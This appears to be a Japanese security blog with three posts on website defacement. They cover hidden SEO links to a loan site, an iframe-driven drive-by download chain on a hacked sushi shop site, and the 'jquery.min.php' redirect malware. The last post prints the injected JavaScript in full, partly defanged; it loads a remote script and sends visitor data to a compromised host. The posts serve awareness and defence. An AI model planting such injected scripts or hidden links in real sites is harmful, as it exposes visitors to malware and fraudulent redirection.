無題なログ

セキュリティ情報、迷惑メール、フィッシング詐欺、迷惑ソフト削除、Windows の小ネタを書き出している日本語ブログです~ (*^ー^)ノ

カテゴリ: サイト改ざん

隠しリンクstructurefunding.com改ざん被害 日本の一般サイト多数

イメージ 4
Image いらすとや

ビジネスローン の宣伝と思われる英語表記の海外サイト

structurefunding[.]com

に向けたリンクを貼る改ざん被害を複数確認してます。<怪しいサイトではなく個人や企業が管理してる日本の一般サイトたち

イメージ 1

イメージ 2

イメージ 3

【挿入されるHTMLコード】
<!--******--><div style="position:absolute;clip:rect(110px,auto,auto,220px);">
<a href="http://www.structurefunding[.]com/small-business-loans/" target="_blank">Small Business Loans</a>
 <a href="http://www.structurefunding[.]com/lines-of-credit/" target="_blank">Big Lines of Credit</a>
 <a href="http://www.structurefunding[.]com/equipment-financing/" target="_blank">Equipment Financing</a>
 <a href="http://www.structurefunding[.]com/working-capital/" target="_blank">Working Capital</a>
 <a href="http://www.structurefunding[.]com/long-term-loans/" target="_blank">Long Term Loans</a>
 <a href="http://www.structurefunding[.]com/sba-loans/" target="_blank">SBA Loans</a>
 <a href="http://www.structurefunding[.]com/short-term-loans/" target="_blank">Short Term Loads</a>
 <a href="http://www.structurefunding[.]com/best-business-loans/" target="_blank">best business loans</a>
 <a href="http://www.structurefunding[.]com/merchant-cash-advances/" target="_blank">Merchant Cash Advances</a><a href="http://www.structurefunding[.]com/business-loans/" target="_blank">business loans</a>
 </div><!--/******-->

アンカータグ <a> の表示は、CSSスタイルシートを使ってブラウザの表面的には表示されなくなるよう 隠しリンク の状態になってます。

検索エンジンで上位表示狙い

Google など検索エンジンの検索結果でより上位に表示させる(SEO)ため、複数のサイトから「loans」の単語でリンクされてる状態に仕立てた不正な手口です。

イメージ 5
Google検索 品質に関するガイドライン

Google の検索結果でのランキングを操作するためにコンテンツに隠しテキストや隠しリンクを含めることは、偽装行為と見なされることがあり、Google のウェブマスター向けガイドライン(品質に関するガイドライン)への違反にあたります。
・CSS を使用してテキストを画面の外に配置する
https://support.google.com/webmasters/answer/66353?hl=ja

ただし、悪意のある第三者が意図的に structurefunding[.]com を貶めるために仕掛けた可能性もあります。

怪しいサイトにアクセスしない!?

この改ざん被害を喰らってる一般サイトにアクセスしても、ユーザーさんには何ら実害はありません。

【理想と現実は厳しぃ】
危険な怪しいサイトにアクセスしない!

一般サイトがハッキングされてる

とは言え、安全なはずの一般サイトが悪意ある第三者に乗っ取られてることは間違いなく危なっかしい! <ウイルス配信サイトに変貌してもおかしくない

このエントリーをはてなブックマークに追加

寿司屋のホームページ見たらウイルス感染! ハッキングサイト閲覧で被害
 
どこぞのお寿司屋さんのホームページが悪意のある第三者によってハッキングされてたので突撃アクセスしてみました。
 
イメージ 1
普通の寿司屋のホームページだけど…
 
見た目では別に異変は分からないけど、HTMLソースコードを確認してみると外部サイトを裏でヒッソリ読み込む不正な<iframe>タグが挿入されてます!
 
イメージ 2
ソースコードを確認すると怪しい<iframe>タグが確認できる
 
Windowsパソコンの ウイルス感染経路の1つになってる Adobe Flash Player を更新しないで旧バージョンのまま放置してる危険な状況を再現して、ウイルスが強制的に起動し感染した瞬間がコチラ!
 
イメージ 3
右側はプロセスの状況を表示するツール Process Explorer
 
《ドライブバイ・ダウンロードによるウイルス強制感染の流れ》

http //www.******.jp/ ← 寿司屋
 ↓ <iframe>タグで強制読み込み
http //******.co.jp/ *****.php ← リダイレクター (清掃業やってる企業サイトがハッキングされファイル置き場になってる)
 ↓ 強制転送
http //grh.janbanki[.]net/? ~ ... エクスプロイトキット ランディングページ
http //grh.janbanki[.]net/ index.php? ~ ... 不正なFlashファイル
http //grh.janbanki[.]net/ index.php? ~ ... Windows向け実行ファイル
 
プロセスの様子を見ると、ブラウザ iexplore.exe の傘下に謎のファイル 3AA6.tmp が存在してることが分かります。
 
この正体はWindows向け実行ファイルであり、起動して感染してしまったウイルスなのです。 <ダウンロードウィンドウや起動の確認場面はいっさい無く

怪しいサイトにアクセスしない、は無理

ウイルス対策と称して『怪しいサイトにアクセスしない♪』というのを見かけるけど、リアル世界で起こってる脅威と相反して、けっこう無謀なことを要求してることが分かるはず。
このような改ざん被害は日本も含めて世界中で日常的に発生していて、そこがアダルトサイトや企業サイトや個人運営サイトやブログだったりして、何だかんだコンテンツの中身はさして関係ないよぅ。
関連するブログ記事
・ 偽FlashPlayer.exeを起動させる巧妙な手口 正規サイトがウイルス配布?
・ 要注意 不正広告からウイルス感染被害! 唯一の対策と影響環境は?
このエントリーをはてなブックマークに追加

リダイレクト改ざんvar a setTimeout jquery.min.php JavaScriptコード
 
{{{ 2016年2月 更新 }}}
 
Google検索などを経由してアクセスしてきたら、別の不正なページへ強制リダイレクトさせる不正なJavaScriptコードが確認されてます! <勝手に強制転送
  • JavaScriptコードの挿入位置
    <head>タグ終端の直前に<script>~</script>タグが挿入される
     
  • 改ざんされる原因?
    WordPress を利用したサイトやブログが侵害されてるので、旧バージョンの脆弱性がらみで第三者がサーバーへ不正アクセス? あるいは管理パスワードがテキトーすぎ?
    Joomla! を利用してるサーバーも侵害されてるらしい
この不正なJavaScriptコードが挿入されるハッキング被害が、日本も含め世界中の正規サイトでたくさん起こってる感じ? <「怪しいサイト」ではないところばかり…
 
侵害されてる一般サイトの改ざん状況
 
イメージ 1
 
イメージ 2
 
イメージ 3
 
挿入される不正なJavaScriptコード
<script>var a = '';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type ="text/javascript" src ="' + 'http //[別の侵害さたサイトのドメイン名]/ js/ jquery.min.php' + '?key=**' + '&utm_campaign=' + '*****' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
<body>
<script>var a = '; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http //[別の侵害さたサイトのドメイン名]/ js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>
<body>
<script>var a = '';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src = "http://[別の侵害さたサイトのドメイン名]/ js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://[別の侵害さたサイトのドメイン名]/ js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
</head>
<body>
【ウイルス検出名】
Avast JS:Injection-A JS:Injection-I
AVG JS/Redir
Avira HTML/Infected.WebPage.Gen6 HTML/ExpKit.Gen2
ESET JS/TrojanDownloader.FakejQuery.A
McAfee JS/Redirector.db
Microsoft Trojan:JS/Redirector.QE Trojan:JS/Redirector.QD
Sophos Troj/JSRedir-RX
 
別ドメインに設置された『 ~/js/jquery.min.php 』を読み込むようになっていて正規のJavaScriptライブラリ jQuery と似せたファイル名で正規の処理と思い込ませようとしてますかい。
 
jQuery.min.php Malware Affects Thousands of Websites - Sucuri
https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html
 
大量インジェクションにより、全世界で数千の Web サイトが感染 Web Attack: Mass Injection Website 19 | Symantec
http://www.symantec.com/connect/blogs/web-11
関連するブログ記事
WordPressブログ改ざん被害 1Aqapkrv'02v JavaScriptコード挿入
FilesMan? 運営サイトがハッキングされバックドアがサーバーに設置される
tag5479347351 iframeハッキングtag1.php Backdoor Kelihos感染ボットネット
危険Web Diary Professional! ハッキングで通販詐欺サイト誘導ページ作成被害
このエントリーをはてなブックマークに追加

↑このページのトップヘ